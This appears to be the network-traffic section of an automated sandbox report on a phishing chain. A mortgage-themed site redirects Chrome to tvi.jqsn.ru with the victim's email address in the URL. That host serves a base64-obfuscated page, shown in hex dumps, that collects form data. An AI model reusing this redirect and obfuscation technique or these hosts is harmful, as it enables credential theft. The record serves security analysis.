                                                                                                                          Apr 17, 2024 02:34:23.224313021 CEST1.1.1.1192.168.2.40x40ebNo error (0)tvi.jqsn.ru65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:24.997554064 CEST1.1.1.1192.168.2.40x6f81No error (0)www.google.com172.217.215.147A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:24.997554064 CEST1.1.1.1192.168.2.40x6f81No error (0)www.google.com172.217.215.103A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:24.997554064 CEST1.1.1.1192.168.2.40x6f81No error (0)www.google.com172.217.215.105A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:24.997554064 CEST1.1.1.1192.168.2.40x6f81No error (0)www.google.com172.217.215.104A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:24.997554064 CEST1.1.1.1192.168.2.40x6f81No error (0)www.google.com172.217.215.106A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:24.997554064 CEST1.1.1.1192.168.2.40x6f81No error (0)www.google.com172.217.215.99A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:24.998156071 CEST1.1.1.1192.168.2.40x5a81No error (0)www.google.com65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:25.644908905 CEST1.1.1.1192.168.2.40x2adcNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:25.644908905 CEST1.1.1.1192.168.2.40x2adcNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:25.644908905 CEST1.1.1.1192.168.2.40x2adcNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:25.644908905 CEST1.1.1.1192.168.2.40x2adcNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:25.650624990 CEST1.1.1.1192.168.2.40x5adNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:25.650624990 CEST1.1.1.1192.168.2.40x5adNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:25.653572083 CEST1.1.1.1192.168.2.40x9107No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:26.989073992 CEST1.1.1.1192.168.2.40x95b7No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:26.989073992 CEST1.1.1.1192.168.2.40x95b7No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:26.991345882 CEST1.1.1.1192.168.2.40xf8a6No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:28.322742939 CEST1.1.1.1192.168.2.40xa766No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:28.322742939 CEST1.1.1.1192.168.2.40xa766No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:28.323311090 CEST1.1.1.1192.168.2.40x5430No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:28.788676023 CEST1.1.1.1192.168.2.40xbec3No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:38.860030890 CEST1.1.1.1192.168.2.40xf1f3No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:38.860030890 CEST1.1.1.1192.168.2.40xf1f3No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:43.640177965 CEST1.1.1.1192.168.2.40x953cNo error (0)tvi.jqsn.ru172.67.130.212A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:43.640177965 CEST1.1.1.1192.168.2.40x953cNo error (0)tvi.jqsn.ru104.21.3.147A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:43.699336052 CEST1.1.1.1192.168.2.40xcc37No error (0)tvi.jqsn.ru65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:48.346987963 CEST1.1.1.1192.168.2.40xf135No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:48.347616911 CEST1.1.1.1192.168.2.40xcc9No error (0)www.google.com172.217.215.104A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:48.347616911 CEST1.1.1.1192.168.2.40xcc9No error (0)www.google.com172.217.215.106A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:48.347616911 CEST1.1.1.1192.168.2.40xcc9No error (0)www.google.com172.217.215.103A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:48.347616911 CEST1.1.1.1192.168.2.40xcc9No error (0)www.google.com172.217.215.147A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:48.347616911 CEST1.1.1.1192.168.2.40xcc9No error (0)www.google.com172.217.215.105A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:48.347616911 CEST1.1.1.1192.168.2.40xcc9No error (0)www.google.com172.217.215.99A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:48.347650051 CEST1.1.1.1192.168.2.40x247fNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:48.347650051 CEST1.1.1.1192.168.2.40x247fNo error (0)d2vgu95hoyrpkh.cloudfront.net108.156.152.4A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:48.347650051 CEST1.1.1.1192.168.2.40x247fNo error (0)d2vgu95hoyrpkh.cloudfront.net108.156.152.114A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:48.347650051 CEST1.1.1.1192.168.2.40x247fNo error (0)d2vgu95hoyrpkh.cloudfront.net108.156.152.88A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:48.347650051 CEST1.1.1.1192.168.2.40x247fNo error (0)d2vgu95hoyrpkh.cloudfront.net108.156.152.27A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:48.348076105 CEST1.1.1.1192.168.2.40x9e0dNo error (0)www.google.com65IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:51.721091986 CEST1.1.1.1192.168.2.40xf497No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:34:51.721091986 CEST1.1.1.1192.168.2.40xf497No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:35:13.924616098 CEST1.1.1.1192.168.2.40x9bb2No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:35:13.924616098 CEST1.1.1.1192.168.2.40x9bb2No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:35:28.800514936 CEST1.1.1.1192.168.2.40x2dc9No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:35:33.461791039 CEST1.1.1.1192.168.2.40x54e0No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Apr 17, 2024 02:35:33.461791039 CEST1.1.1.1192.168.2.40x54e0No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                                          • bestohiomortgagerate.com
                                                                                                                          • https:
                                                                                                                            • tvi.jqsn.ru
                                                                                                                            • challenges.cloudflare.com
                                                                                                                            • code.jquery.com
                                                                                                                            • www.google.com
                                                                                                                            • cdn.socket.io
                                                                                                                          • fs.microsoft.com
                                                                                                                          • a.nel.cloudflare.com
                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.44973569.49.228.2344433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:22 UTC696OUTGET /dream/mer/7/nobody@nobody.org HTTP/1.1
                                                                                                                          Host: bestohiomortgagerate.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:22 UTC215INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:20 GMT
                                                                                                                          Server: Apache
                                                                                                                          refresh: 0;url=https://tVi.jqsn.ru/i8jbs1sy/#Xnobody@nobody.org
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.44973669.49.228.2344433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:22 UTC633OUTGET /favicon.ico HTTP/1.1
                                                                                                                          Host: bestohiomortgagerate.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://bestohiomortgagerate.com/dream/mer/7/nobody@nobody.org
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:23 UTC164INHTTP/1.1 404 Not Found
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:21 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 315
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          2024-04-17 00:34:23 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.449739104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:23 UTC693OUTGET /i8jbs1sy/ HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          Referer: https://bestohiomortgagerate.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:25 UTC1122INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:24 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache, private
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XKGEFVdKUPEE0rpG64FhOuNMtmoA4C1umsSO9NX1y6y7AmnTj6KBAKBKpLfwVViJxe5umD9lNCxuLOmBC8lZCKWW4Rw%2BtTTaKZIA5Jcp9rcRKUUuQuQYSPTBncZvqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6IjdFR0ZSajlLampnQ3R3RmpLbkt3a0E9PSIsInZhbHVlIjoiNDZLaGJoeUhhWGFRZWhkU0VkRlRSa1IrVVVWekdyTm0yMCtHMk8rVVA3d2NzQmZRSlhDalpMTFJFTTZOM1hVZXNKbnJ2T0VGWnNLVkZPcUpaSEtVKzIyYXhTQmhsMzkzM0tqVThVV0tTSURMMDh6VFAxeWwzUW9BeVlnRTlaOTUiLCJtYWMiOiIzNDMzZGY0NmI0MTdhZTIyOTlhYTgzNDNkZjg5NzRkZjk0YjJlMTVhOWU5NjhjMTI4ZmQzODQ4MmM3YjAxNzkxIiwidGFnIjoiIn0%3D; expires=Wed, 17-Apr-2024 02:34:24 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                          2024-04-17 00:34:25 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 4a 54 55 55 68 6f 5a 31 46 6e 51 6e 46 4b 56 53 38 72 52 45 38 76 64 31 6c 51 59 31 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 52 45 70 7a 54 31 52 47 55 6d 35 42 51 30 77 33 61 43 39 4a 54 31 4e 52 63 45 4e 35 64 30 64 78 4e 32 4a 61 4f 46 6b 79 61 33 46 46 51 58 4a 35 54 30 74 6c 54 32 70 7a 4f 47 5a 4f 59 58 64 56 64 30 64 61 51 6a 42 5a 51 7a 49 79 4c 30 51 31 59 6b 5a 71 62 6b 78 47 4e 45 6c 56 51 6c 70 6f 62 57 6c 45 54 30 34 31 56 33 64 71 59 33 68 57 63 33 64 48 4d 6d 35 35 55 6a 4a 4a 52 33 5a 4f 52 33 4a 61 52 6e 6c 30 56 69 39 4b 5a 79 39 4e 62 31 6b 79 62 58 5a 4d 52 33 70 54 63 7a 64 45 5a 57 4a 56 5a 6c 5a 46 4f 56 45
                                                                                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlJTUUhoZ1FnQnFKVS8rRE8vd1lQY1E9PSIsInZhbHVlIjoiREpzT1RGUm5BQ0w3aC9JT1NRcEN5d0dxN2JaOFkya3FFQXJ5T0tlT2pzOGZOYXdVd0daQjBZQzIyL0Q1YkZqbkxGNElVQlpobWlET041V3dqY3hWc3dHMm55UjJJR3ZOR3JaRnl0Vi9KZy9Nb1kybXZMR3pTczdEZWJVZlZFOVE
                                                                                                                          2024-04-17 00:34:25 UTC1369INData Raw: 31 38 35 61 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58 4a 35 4c 54 4d 75 4e 69 34 77 4c 6d 31 70 62 69 35 71 63 79 49 2b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 59 32 68 68 62 47
                                                                                                                          Data Ascii: 185a<script>document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbG
                                                                                                                          2024-04-17 00:34:25 UTC1369INData Raw: 44 51 6f 67 49 47 39 32 5a 58 4a 6d 62 47 39 33 4f 69 42 6f 61 57 52 6b 5a 57 34 37 44 51 70 39 44 51 6f 6a 55 56 4e 45 56 58 42 34 5a 58 42 4c 56 43 42 6f 4e 48 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 6a 41 37 62 57 46 79 5a 32 6c 75 4c 57 4a 76 64 48 52 76 62 54 6f 75 4e 58 4a 6c 62 54 74 6d 62 32 35 30 4c 58 64 6c 61 57 64 6f 64 44 6f 31 4d 44 41 37 62 47 6c 75 5a 53 31 6f 5a 57 6c 6e 61 48 51 36 4d 53 34 79 4f 33 30 4e 43 69 4e 52 55 30 52 56 63 48 68 6c 63 45 74 55 49 47 67 30 65 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 70 6a 59 57 78 6a 4b 44 45 75 4d 79 6b 37 66 51 30 4b 51 47 31 6c 5a 47 6c 68 49 43 68 74 61 57 34 74 64 32 6c 6b 64 47 67 36 4d 54 49 77 4d 48 42 34 4b 58 73 4e 43 69 4e 52 55 30 52 56 63 48 68 6c 63 45 74 55 49 47 67 30 65 32 5a
                                                                                                                          Data Ascii: DQogIG92ZXJmbG93OiBoaWRkZW47DQp9DQojUVNEVXB4ZXBLVCBoNHttYXJnaW4tdG9wOjA7bWFyZ2luLWJvdHRvbTouNXJlbTtmb250LXdlaWdodDo1MDA7bGluZS1oZWlnaHQ6MS4yO30NCiNRU0RVcHhlcEtUIGg0e2ZvbnQtc2l6ZTpjYWxjKDEuMyk7fQ0KQG1lZGlhIChtaW4td2lkdGg6MTIwMHB4KXsNCiNRU0RVcHhlcEtUIGg0e2Z
                                                                                                                          2024-04-17 00:34:25 UTC1369INData Raw: 54 49 67 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 49 44 41 75 4e 58 4a 6c 62 53 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 31 46 54 52 46 56 77 65 47 56 77 53 31 51 67 4c 6d 67 30 49 48 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 47 4e 68 62 47 4d 6f 4c 6a 6b 77 4d 48 4a 6c 62 53 41 72 49 43 34 7a 64 6e 63 70 4f 33 30 4e 43 69 4e 52 55 30 52 56 63 48 68 6c 63 45 74 55 49 43 35 71 64 58 4e 30 61 57 5a 35 4c 57 4e 76 62 6e 52 6c 62 6e 51 74 59 32 56 75 64 47 56 79 65 32 70 31 63 33 52 70 5a 6e 6b 74 59 32 39 75 64 47 56 75 64 44 70 6a 5a 57 35 30 5a 58 49 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69 4e 52 55 30 52 56 63 48 68 6c 63 45 74 55 4c 6d 31 30 4c 54 56 37 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 7a 63 6d 56 74
                                                                                                                          Data Ascii: TIge21hcmdpbi10b3A6IDAuNXJlbSFpbXBvcnRhbnQ7fQ0KI1FTRFVweGVwS1QgLmg0IHtmb250LXNpemU6IGNhbGMoLjkwMHJlbSArIC4zdncpO30NCiNRU0RVcHhlcEtUIC5qdXN0aWZ5LWNvbnRlbnQtY2VudGVye2p1c3RpZnktY29udGVudDpjZW50ZXIhaW1wb3J0YW50O30NCiNRU0RVcHhlcEtULm10LTV7bWFyZ2luLXRvcDozcmVt
                                                                                                                          2024-04-17 00:34:25 UTC1369INData Raw: 30 69 61 48 52 30 63 48 4d 36 4c 79 39 69 5a 58 4e 30 62 32 68 70 62 32 31 76 63 6e 52 6e 59 57 64 6c 63 6d 46 30 5a 53 35 6a 62 32 30 76 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 64 57 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 31 59 53 49 67 64 6d 46 73 64 57 55 39 49 6b 31 76 65 6d 6c 73 62 47 45 76 4e 53 34 77 49 43 68 58 61 57 35 6b 62 33 64 7a 49 45 35 55 49 44 45 77 4c 6a 41 37 49 46 64 70 62 6a 59 30 4f 79 42 34 4e 6a 51 70 49 45 46 77 63 47 78 6c 56 32 56 69 53 32 6c 30 4c 7a 55 7a 4e 79 34 7a 4e 69 41 6f 53 30 68 55 54 55 77 73 49 47 78 70 61 32 55 67 52 32 56 6a 61 32 38 70 49 45 4e 6f 63 6d 39 74 5a 53 38 78 4d 54 63 75 4d 43 34 77 4c 6a 41 67 55
                                                                                                                          Data Ascii: 0iaHR0cHM6Ly9iZXN0b2hpb21vcnRnYWdlcmF0ZS5jb20vIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkdWEiIG5hbWU9ImJsdGR1YSIgdmFsdWU9Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTcuMC4wLjAgU
                                                                                                                          2024-04-17 00:34:25 UTC766INData Raw: 74 5a 58 52 6f 62 32 51 36 49 43 4a 51 54 31 4e 55 49 69 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 4a 76 5a 48 6b 36 49 47 35 6c 64 79 42 47 62 33 4a 74 52 47 46 30 59 53 68 5a 52 6e 52 51 54 55 70 6a 5a 55 56 78 4b 51 30 4b 49 43 41 67 49 43 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 48 4a 6c 63 33 42 76 62 6e 4e 6c 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 79 5a 58 4e 77 62 32 35 7a 5a 53 35 71 63 32 39 75 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 5a 47 46 30 59 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68 6b 59 58 52 68 57 79 64 7a 64 47 46 30 64 58 4d 6e 58 53 41 39 50 53 41 6e 63 33
                                                                                                                          Data Ascii: tZXRob2Q6ICJQT1NUIiwNCiAgICAgICAgICAgIGJvZHk6IG5ldyBGb3JtRGF0YShZRnRQTUpjZUVxKQ0KICAgICAgICB9KS50aGVuKHJlc3BvbnNlID0+IHsNCiAgICAgICAgICAgIHJldHVybiByZXNwb25zZS5qc29uKCk7DQogICAgICAgIH0pLnRoZW4oZGF0YSA9PiB7DQogICAgICAgICAgICBpZihkYXRhWydzdGF0dXMnXSA9PSAnc3
                                                                                                                          2024-04-17 00:34:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.449743104.17.2.1844433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:25 UTC643OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://tvi.jqsn.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:26 UTC352INHTTP/1.1 302 Found
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:26 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          location: /turnstile/v0/b/bcc5fb0a8815/api.js?render=explicit
                                                                                                                          access-control-allow-origin: *
                                                                                                                          cache-control: max-age=300, public
                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 87585450eb5d1351-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.449742151.101.66.1374433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:25 UTC617OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                          Host: code.jquery.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://tvi.jqsn.ru/
